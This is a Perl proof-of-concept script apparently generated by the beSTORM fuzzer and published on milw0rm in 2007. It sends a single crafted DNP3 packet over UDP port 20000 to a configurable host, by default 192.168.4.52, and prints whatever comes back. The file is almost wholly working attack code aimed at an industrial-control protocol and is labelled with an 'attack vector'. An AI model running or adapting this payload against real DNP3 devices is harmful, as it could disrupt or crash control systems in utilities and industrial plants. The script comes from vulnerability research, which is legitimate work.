143 lines
No EOL
2.6 KiB
Perl
Executable file
143 lines
No EOL
2.6 KiB
Perl
Executable file
#!/usr/bin/perl
|
|
# Automatically generated by beSTORM(tm)
|
|
# Copyright Beyond Security (c) 2003-2007 ($Revision: 3741 $)
|
|
|
|
# Attack vector:
|
|
# M0:P0:B0.BT0:B0.BT0:B0.BT0:B0.BT0
|
|
|
|
# Module:
|
|
# DNP3
|
|
|
|
use strict;
|
|
use warnings;
|
|
|
|
use Getopt::Std;
|
|
use IO::Socket::INET;
|
|
|
|
$SIG{INT} = \&abort;
|
|
|
|
my $host = '192.168.4.52';
|
|
my $port = 20000;
|
|
my $proto = 'udp';
|
|
my $sockType = SOCK_DGRAM;
|
|
my $timeout = 1;
|
|
|
|
#Read command line arguments
|
|
my %opt;
|
|
my $opt_string = 'hH:P:t:';
|
|
getopts( "$opt_string", \%opt );
|
|
|
|
if (defined $opt{h}) {
|
|
usage()
|
|
}
|
|
|
|
$host = $opt{H} ? $opt{H} : $host;
|
|
$port = $opt{P} ? $opt{P} : $port;
|
|
$timeout = $opt{t} ? $opt{t} : $timeout;
|
|
|
|
my @commands = (
|
|
{Command => 'Send',
|
|
Data => "\x05\x64\x15\xC2\x01\x00\x00\x00\x00\x00\xC3\xC0\x01\x01\x00". "\x01\x07\x08\x01\x02\x03\x04\x05\x06\x07\x08"},
|
|
{Command => 'Receive'},
|
|
|
|
);
|
|
|
|
###
|
|
# End user configurable part
|
|
###
|
|
|
|
#1. Create a new connection
|
|
my $sock = new IO::Socket::INET (
|
|
PeerAddr => $host,
|
|
PeerPort => $port,
|
|
Proto => $proto,
|
|
Type => $sockType,
|
|
Timeout => $timeout,
|
|
)
|
|
or die "socket error: $!\n\n";
|
|
|
|
print "connected to: $host:$port\n";
|
|
|
|
$sock->autoflush(1);
|
|
binmode $sock;
|
|
|
|
#2. communication part
|
|
|
|
foreach my $command (@commands)
|
|
{
|
|
if ($command->{'Command'} eq 'Receive')
|
|
{
|
|
my $buf = receive($sock, $timeout);
|
|
if (length $buf)
|
|
{
|
|
print "received: [$buf]\n";
|
|
}
|
|
}
|
|
elsif ($command->{'Command'} eq 'Send')
|
|
{
|
|
print "sending: [".$command->{'Data'}."]\n";
|
|
send ($sock, $command->{'Data'}, 0) or die "send failed, reason: $!\n";
|
|
}
|
|
}
|
|
|
|
#3. Close connection
|
|
close ($sock);
|
|
|
|
#The end
|
|
|
|
sub receive
|
|
{
|
|
my $sock = shift;
|
|
my $timeout = shift;
|
|
|
|
my $tmpbuf;
|
|
my $buf = "";
|
|
|
|
while(1)
|
|
{ # Example from perldoc -f alarm
|
|
eval {
|
|
local $SIG{ALRM} = sub { die "timeout\n" };
|
|
alarm $timeout;
|
|
|
|
my $ret = read $sock, $tmpbuf, 1; #We read data one byte at a time.
|
|
if ( !defined $ret or $ret == 0 )
|
|
{ #EOF
|
|
die "timeout\n";
|
|
}
|
|
|
|
alarm 0;
|
|
$buf .= $tmpbuf;
|
|
};
|
|
if ($@) { #time out
|
|
if($@ eq "timeout\n")
|
|
{
|
|
last;
|
|
}
|
|
else {
|
|
die "receive aborted\n";
|
|
}
|
|
}
|
|
} #while
|
|
return $buf;
|
|
}
|
|
|
|
sub abort
|
|
{
|
|
print "aborting...\n";
|
|
if ($sock)
|
|
{
|
|
close $sock;
|
|
}
|
|
die "User aborted operation\n";
|
|
}
|
|
sub usage
|
|
{
|
|
print "usage: $0 [-hHPt]\n";
|
|
print "-h\t: this help message\n";
|
|
print "-H\t: override default host - $host\n";
|
|
print "-P\t: override default port - $port\n";
|
|
print "-t\t: set socket timeout in seconds\n";
|
|
exit 0;
|
|
}
|
|
|
|
# milw0rm.com [2007-08-31] |